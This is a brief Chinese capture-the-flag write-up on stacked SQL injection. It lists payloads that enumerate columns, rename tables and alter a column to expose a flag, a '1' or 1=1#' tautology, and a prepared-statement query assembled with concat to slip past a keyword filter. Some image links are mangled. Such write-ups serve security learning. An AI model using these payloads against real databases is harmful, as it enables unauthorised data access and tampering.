堆叠注入
    ![H7P2B%G6[NG8PW0B$CG$UK.png](https://cdn.nlark.com/yuque/0/2021/png/528570/1619348456807-f567e230-a0be-4508-9f8f-1d9d83db70bf.png#height=426&id=P3f1c&margin=%5Bobject%20Object%5D&name=H7P2B%25G6%5BNG8PW0B%24CG%24UK.png&originHeight=426&originWidth=498&originalType=binary&ratio=1&size=11624&status=done&style=none&width=498)
    ![P_Q[)R%LA]~ZXGG3PJ@_FN.png
    1’;show columns from 1919810931114514;#ES5)_W_O1FK$U}4L0(NM9LC.png
    由于我们默认查询的表是word,因此我们要将word表改名,把我们需要的表改成word

    1. 1';RENAME TABLE `words` TO `words1`;RENAME TABLE `1919810931114514` TO `words`;ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;#

    再查询 1’ or 1=1#
    得到flag;

    或者使用预处理语句绕过过滤

    1';set @a=concat("sel","ect flag from `1919810931114514`");prepare sql from  @a;execute sql;#